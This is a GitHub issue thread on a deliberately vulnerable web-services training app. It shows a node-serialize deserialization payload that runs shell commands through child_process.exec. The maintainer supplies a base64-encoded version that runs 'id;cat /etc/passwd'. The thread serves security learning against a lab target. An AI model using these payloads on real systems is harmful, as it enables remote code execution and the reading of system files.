snoopysecurity / dvws-node

Damn Vulnerable Web Services is a deliberately vulnerable application with a web service and an API that can be used to learn about web-service and API-related vulnerabilities.
GNU General Public License v3.0

Error on unsafe deserialization #33

Closed halfluke closed 2 years ago

halfluke commented 2 years ago

Request:

```http
POST /api/v2/export HTTP/1.1
Host: dvws.local
Content-Length: 146
accept: application/json; charset=utf-8
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4iLCJwZXJtaXNzaW9ucyI6WyJ1c2VyOnJlYWQiLCJ1c2VyOndyaXRlIiwidXNlcjphZG1pbiJdLCJpYXQiOjE2NTkzMDk3NzQsImV4cCI6MTY1OTQ4MjU3NCwiaXNzIjoiaHR0cHM6Ly9naXRodWIuY29tL3Nub29weXNlY3VyaXR5In0.3tRmhuvBy609M8WSRMdRVExdSbrwHN7sGvWMgdZ0jG8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/json
Origin: http://dvws.local
Referer: http://dvws.local/api-docs/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

{ "rce": "_$$ND_FUNC$$_function (){\n \t require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
```

Getting:

```http
HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: http://dvws.local
Vary: Origin
Access-Control-Allow-Credentials: true
Cache-Control: no-store, no-cache, must-revalidate, private
Content-Security-Policy: default-src 'none'
X-Content-Type-Options: nosniff
Content-Type: text/html; charset=utf-8
Content-Length: 1782
Date: Sun, 31 Jul 2022 23:40:23 GMT
Connection: close

<!DOCTYPE html>
Error
TypeError [ERR_INVALID_ARG_TYPE]: The first argument must be of type string or an instance of Buffer, ArrayBuffer, or Array or an Array-like Object. Received undefined
    at new NodeError (node:internal/errors:372:5)
    at Function.from (node:buffer:323:9)
    at export (/home/dvws-node/controllers/passphrase.js:76:22)
    at Layer.handle [as handle_request] (/home/dvws-node/node_modules/express/lib/router/layer.js:95:5)
    at next (/home/dvws-node/node_modules/express/lib/router/route.js:144:13)
    at validateToken (/home/dvws-node/utils.js:18:9)
    at Layer.handle [as handle_request] (/home/dvws-node/node_modules/express/lib/router/layer.js:95:5)
    at next (/home/dvws-node/node_modules/express/lib/router/route.js:144:13)
    at Route.dispatch (/home/dvws-node/node_modules/express/lib/router/route.js:114:3)
    at Layer.handle [as handle_request] (/home/dvws-node/node_modules/express/lib/router/layer.js:95:5)
    at /home/dvws-node/node_modules/express/lib/router/index.js:284:15
    at Function.process_params (/home/dvws-node/node_modules/express/lib/router/index.js:346:12)
    at next (/home/dvws-node/node_modules/express/lib/router/index.js:280:10)
    at Function.handle (/home/dvws-node/node_modules/express/lib/router/index.js:175:3)
    at router (/home/dvws-node/node_modules/express/lib/router/index.js:47:12)
    at Layer.handle [as handle_request] (/home/dvws-node/node_modules/express/lib/router/layer.js:95:5)
```

snoopysecurity commented 2 years ago

Here the API endpoint is expecting a `data` parameter with base64-encoded data. You will need to send your payload as:

```json
{"data":"eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2lkO2NhdCAvZXRjL3Bhc3N3ZCcsIGZ1bmN0aW9uKGVycm9yLCBzdGRvdXQsIHN0ZGVycikgeyBjb25zb2xlLmxvZyhzdGRvdXQpIH0pO30oKSJ9"}
```

halfluke commented 2 years ago

Ah, thank you for clarifying this!